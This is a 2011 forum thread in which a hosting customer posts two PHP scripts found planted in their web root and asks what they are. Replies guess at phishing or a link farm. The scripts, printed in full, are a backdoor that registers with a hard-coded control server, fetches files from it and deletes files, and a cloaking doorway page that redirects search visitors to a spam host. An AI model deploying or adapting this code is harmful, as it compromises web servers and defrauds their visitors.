Hacked? - Found some strange directories in my root
08-02-2011, 17:12
|
#1
|
|
I've been here before?
Join Date: Jun 2003
Location: I am house...
Services: $KY+HD - BT Option 3 Broadband
Posts: 2,270
|
Hacked? - Found some strange directories in my root
I have a hosted account for my domain and recently found a directory under the /public_html/ with random letters for the directory name and a couple of scripts within including a file that is building up logging information.
Directory perms were 777 (I did not create it!)
I included the content of the scripts below - Anyone know what it is, where it came from or what it is used to do??
INDEX.PHP includes:
PHP Code:
<?php
$k='6fb8e25b609624dc10a68641e846102a';if ($k != md5($_GET['k'])) { echo'nk'; exit; }
$ctl="188.124.3.195";$ctlp="/ctl.php";$c=$_GET[c];
if ($c=='init'){doinit();}if ($c=='check'){docheck();}if ($c=='get'){doget();}if ($c=='del'){dodel();}
function dodel() {
if ($_GET[all]==1) {
$d="."; $dh=opendir($d);
while (($f=readdir($dh)) != false) { $c++; if ($f!="."&&$f!=".."){unlink($f);} } closedir($dh);
$d="cache"; $dh=opendir($d);
while (($f=readdir($dh)) != false) { $c++; if ($f!="."&&$f!=".."){unlink("cache/$f");} } closedir($dh); rmdir("cache"); echo $c;
} else { $fd=fopen("index.html","w");fclose($fd);unlink(basename($_SERVER[PHP_SELF]));}
}
function doget() {
global $ctlp, $ctl; $a = $_GET[a];
$lname = basename($a);
$b=dirname($ctlp);
echo "$b$a";
if (eregi("php$",$lname)){$a1 = str_replace("php", "txt", $a);}
else{$a1=$a;}
$fd=fopen($lname,"w");
$d = g($ctl,80,"$b$a1");
fwrite($fd,$d); fclose($fd);
echo "'".strlen($d)."'";
}
function doinit() {
global$ctl,$ctlp;$b=mkdir("cache");if(!$b){echo '0';exit;}echo g($ctl,80,$ctlp."?c=init&me=".base64_encode(getme()));
}
function docheck(){
echo getme();if (fopen("tmp","w")) {echo";1";}else{echo";0";}
}
function getme() { return "http://".$_SERVER[HTTP_HOST]."".$_SERVER[PHP_SELF]; }
function g($server, $port, $file) {
$socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");
$refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;
fputs($socket, "GET $file HTTP/1.0\r\n");
fputs($socket, "Host: $server\r\n\r\n");
$dat = '';
do {$dat .= fgets ($socket, 1024);} while (strpos($dat,"\r\n\r\n") === false);
$dat = '';
while (!feof($socket)) {$dat .= fread($socket,8192);}
fclose($socket);
return $dat;
}
?>
XTYB.PHP includes:
PHP Code:
<?php
dolog();
error_reporting(0);
$nr=rand(9,11);
list($arg,$val)=@each($_GET);
$t=base64_decode("PEhUTUw+DQogICAgPEhFQUQ+DQogICAgICAgIDxUSVRMRT4jdGl0bGUjPC9USVRMRT4gICAgIA0KICAgICAgICA8c3R5bGU+DQpIMw0Kew0KCW1hcmdpbi1sZWZ0OjEuNThlbTsNCn0NCkg0DQp7IA0KCW1hcmdpbi1sZWZ0OjMuMTZlbTsNCn0NCkg1DQp7DQoJbWFyZ2luLWxlZnQ6NC43NGVtOw0KfQ0KLmhvdXNlYnV0dG9uIHsNCglmb250LXdlaWdodDogYm9sZDsNCgl0ZXh0LWFsaWduOiBjZW50ZXI7DQoJbWFyZ2luLWJvdHRvbTogMnB4Ow0KCW1hcmdpbi10b3A6IDJweDsNCgl3aWR0aDphdXRvOw0KfQ0KPC9zdHlsZT4NCiAgICA8L0hFQUQ+DQo8Qk9EWT4NCjxESVYgSUQ9Im5hdmlnYXRvciI+DQoJPFRBQkxFIElEPSJUYWJsZTEiPg0KDQoJCTxUUj4NCgkJCTxURD4gLyA8L1REPg0KCQk8L1RSPg0KDQoJPC9UQUJMRT4NCjwvRElWPg0KDQo8UD4NCg0KI2NvbnRlbnQjDQoNCg0KPC9CT0RZPg0KPC9IVE1MPg0K");
$g = checkg($_SERVER[REMOTE_ADDR]);
if (!$g) {if(eregi("google",$_SERVER[HTTP_REFERER])){
$self=$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI];
$goto='http://longsignups.net/in.cgi?7&ref='.urlencode($_SERVER[HTTP_REFERER])."&page=".urlencode($self);
header("Location: $goto");exit;}}
$q = str_replace("-", " ", urldecode($_GET[$arg]));
$c=1;
$kws = @file('kw.txt');foreach($kws as $k) { if ($c==$id) { $q = trim($k); } $tmp[]=trim($k); } $kws = $tmp;
if (!in_array($q,$kws)){echo '404';exit;}
shuffle($kws);$rl = array_splice($kws,0,$nr);
foreach($rl as $r) { $rrl[] = "<a href=\"?$arg=".urlencode(str_replace(" ", "-", $r))."\">$r</a>"; }
$h=md5($q); if(file_exists("cache/$h")){echo join('',file("cache/$h"));exit;}
$c=gets2($q);
$t=str_replace("#title#",ucwords($q),$t);
$t=str_replace("#kw#",$q,$t);
$cont = array_merge($c, $rrl);
//$cont = $c;
shuffle($cont);
$t=str_replace("#content#",join(' ',$cont),$t);
$t=str_replace("#relink#",join(' ', ''),$t);
$t = preg_replace_callback("/#rnum#/",create_function('$matches','return gp();'), $t);
$f=@fopen("cache/$h","w");fwrite($f,$t);fclose($f);
echo $t;exit;
function dolog() {
$str = "$_SERVER[REMOTE_ADDR] -- ".date("Y-m-d H:i:s")." -- $_SERVER[SERVER_NAME] -- $_SERVER[REQUEST_URI] -- $_SERVER[HTTP_REFERER] -- $_SERVER[HTTP_USER_AGENT]\n"; $lp = "evekwalicu.txt"; $fd = fopen($lp, "a");fwrite($fd, $str); fclose($fd);
}
function gets2($kw) {
$sc = 40;
$kw =trim($kw);
$base = "/WebSearchService/rss/webSearch.xml?appid=yahoosearchwebrss&results=$sc&query=".urlencode($kw)."&adult_ok=1";
$req = $base;
$s = @fsockopen("api.search.yahoo.com", 80, $_en, $_er, 10);
$rstr = "GET $req HTTP/1.0\r\n";
$rstr .= "Host: api.search.yahoo.com\r\n";
$rstr .= "\r\n";
@fwrite($s,$rstr);
$dat='';
do {$dat .= fgets ($s);} while (strpos($dat,"\r\n\r\n") === false);
$dat='';
while (!feof($s)) {$dat .= fread($s,8192);}
$c = $dat;
@fclose($s);
$r = preg_match_all("/<item>(.+?)<\/item>/", $c, $na);
if ($r < 3) { return 0; }
$ret = array();
for($i=1;$i<sizeof($na[1]);$i++) {
$tmp = $na[1][$i];
@eregi('<title>(.+)</title>', $tmp, $na2);
$title = $na2[1];
@eregi('<description>(.+)</description>', $tmp, $na2);
$description = $na2[1];
$description = str_replace("...", ".", $description);
@eregi('<link>(.+)</link>', $tmp, $na2);
$link = $na2[1];
//$ret[] = array($link, $title, $description);
//if ($i==1) {
$ret[] = "\n\n<p><a href=\"$link\">$title</a> $description";
//} else {
// $ret[] = " <br>$title $description ";
//}
}
$ret[] = "<P>";
$ret[] = "<P>";
$ret[] = "<P>";
shuffle($ret); return $ret;
}
function checkg($ip) {
$nfilter = split("\n", "72.14.192.0/18
74.125.0.0/16
64.233.160.0/19
66.249.64.0/19");
foreach ($nfilter as $f) {
if (ip_in_range($ip, $f)) { return 1; }
} return 0;
}
Function decbin32 ($dec) { return str_pad(decbin($dec), 32, '0', STR_PAD_LEFT); }
Function ip_in_range($ip, $range) {
if (strpos($range, '/') !== false) {
list($range, $netmask) = explode('/', $range, 2);
if (strpos($netmask, '.') !== false) {
$netmask = str_replace('*', '0', $netmask);
$netmask_dec = ip2long($netmask);
return ( (ip2long($ip) & $netmask_dec) == (ip2long($range) & $netmask_dec) );
} else {
$x = explode('.', $range);
while(count($x)<4) $x[] = '0';
list($a,$b,$c,$d) = $x;
$range = sprintf("%u.%u.%u.%u", empty($a)?'0':$a, empty($b)?'0':$b,empty($c)?'0':$c,empty($d)?'0':$d);
$range_dec = ip2long($range);
$ip_dec = ip2long($ip);
$broadcast_dec = bindec(substr(decbin32($range_dec), 0, $netmask)
. str_pad('', 32-$netmask, '1'));
$wildcard_dec = pow(2, (32-$netmask)) - 1;
$broadcast_dec = $range_dec | $wildcard_dec;
return (($ip_dec & $broadcast_dec) == $ip_dec);
}
} else {
if (strpos($range, '*') !==false) { // a.b.*.* format
$lower = str_replace('*', '0', $range);
$upper = str_replace('*', '255', $range);
$range = "$lower-$upper";
}
if (strpos($range, '-')!==false) { // A-B format
list($lower, $upper) = explode('-', $range, 2);
$lower_dec = ip2long($lower);
$upper_dec = ip2long($upper);
$ip_dec = ip2long($ip);
return ( ($ip_dec>=$lower_dec) && ($ip_dec<=$upper_dec) );
}
return false;
}
$ip_dec = ip2long($ip);
return (($ip_dec & $netmask_dec) == $ip_dec);
}
function gp ($length = 4)
{
$password = "";
$possible = "abcdfghjkmnpqrstvwxyz";
$i = 0;
while ($i < $length) {
$char = substr($possible, mt_rand(0, strlen($possible)-1), 1);
if (!strstr($password, $char)) {
$password .= $char;
$i++;
}
}
return $password;
}
?>
|
|
|
|
08-02-2011, 17:47
|
#2
|
|
Cable Forum Team
Join Date: Jun 2003
Location: Sarf east Luhndun.
Services: Virgin for TV and Internet, BT for phone
Posts: 24,243
|
Re: Hacked? - Found some strange directories in my root
Not entirely sure what the two PHP scripts are doing, but it looks like an attempt at a Phishing site.
__________________
Just to make it clear if a post is bold and is from a team member, it's a moderating decision. If it's not bold or not from a team member, it's not.
|
|
|
|
|
08-02-2011, 17:59
|
#3
|
|
I've been here before?
Join Date: Jun 2003
Location: I am house...
Services: $KY+HD - BT Option 3 Broadband
Posts: 2,270
|
Re: Hacked? - Found some strange directories in my root
This is what it created in EVEKWALICU.TXT
PHP Code:
66.160.206.167 -- 2010-03-27 13:53:52 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=when-to-reformat-hard-drive -- --
66.160.206.186 -- 2010-03-27 13:56:20 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=melbourne-fl-performance"> -- --
66.160.206.186 -- 2010-03-27 13:57:34 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=melbourne-fl-performance -- --
202.69.237.143 -- 2010-03-27 13:57:36 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=form-af-1540 -- -- B-Wiki/20050210
66.160.206.186 -- 2010-03-27 13:59:09 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=customer-survey-form-for-email-retail -- --
66.160.206.167 -- 2010-03-27 14:02:16 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=georgia-mortgage-form-free"> -- --
66.160.206.167 -- 2010-03-27 14:03:04 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=salaries-in-information-sciences -- --
72.44.48.77 -- 2010-03-27 14:06:55 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=salaries-in-information-sciences -- -- Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )
66.160.206.186 -- 2010-03-27 14:10:05 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=nfl-2006-nbc-pink-performed"> -- --
66.160.206.186 -- 2010-03-27 14:10:14 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=nfl-2006-nbc-pink-performed"> -- --
66.160.206.186 -- 2010-03-27 14:10:18 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=nfl-2006-nbc-pink-performed"> -- --
95.108.249.29 -- 2011-02-08 13:10:25 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=how-do-they-perform-an-emg -- -- Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)
124.115.0.169 -- 2011-02-08 13:13:52 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=belly-button-information-piercing -- -- Sosospider+(+http://help.soso.com/webspider.htm)
91.201.66.6 -- 2011-02-08 13:19:00 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=standing-order-form-letting -- -- Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
91.201.66.6 -- 2011-02-08 13:19:00 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=registration-information-ip -- http://mydomain.co.uk/kxqsyn/xtyb.php?jsya=standing-order-form-letting -- Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
95.108.249.29 -- 2011-02-08 13:38:02 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=how-to-perform-dent-repair -- -- Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)
119.235.237.16 -- 2011-02-08 13:59:03 -- mydomain.co.uk -- /kxqsyn/xtyb.php?eq;rental-move-out-form&jsya -- -- Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)
119.235.237.85 -- 2011-02-08 14:01:23 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=american-federation-immigration-reform -- -- Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)
94.213.156.83 -- 2011-02-08 14:02:10 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=famous-violin-performers -- -- Mozilla/4.0 (compatible; ICS)
207.46.13.88 -- 2011-02-08 14:02:29 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=many-stones-can-form-an-arch -- -- Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
95.108.249.29 -- 2011-02-08 14:07:31 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=international-pulp-market-information -- -- Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)
180.171.82.63 -- 2011-02-08 14:09:26 -- mydomain.co.uk -- /kxqsyn/xtyb.php?jsya=the-history-of-school-uniforms -- http://www.baidu.com/s?bs=%D3%A2%D3%EF%B8%A8%B5%BC%B1%A8%C9%CF%BA%A3%B0%CB%C4%EA%BC%B6%BA%AE%BC%D9%CE%C4%D5%C2&f=8&wd=the+history+of+the+school+uniforms -- Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; QQDownload 661; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Start and end of file included as there are approx 30 hits an hour! this file is a few mb in size.
|
|
|
|
|
27-02-2011, 19:46
|
#5
|
|
cf.mega poster
Join Date: Jan 2004
Posts: 3,807
|
Re: Hacked? - Found some strange directories in my root
Don't know enough php to understand fully what it's upto although I think it's doing some kind of search/replace possibly injecting it's own code into other php files in the directory?
It also looks to be calling home to either feedback data to it's authors or to receive commands.
If I see one of my friends online who knows PHP i'll ask them about it.
Edit:
My friend replied with "Looks like the cracker is using the site for a link farm (to generate SEO). It also calls Yahoo's search API."
Interesting...
__________________
'It's not a bug its a feature'
Last edited by dragon; 27-02-2011 at 19:59.
|
|
|
|
|
Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
|
|
|
Posting Rules
|
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
HTML code is Off
|
|
|
All times are GMT +1. The time now is 08:47.
|
Join CF
You are here: 
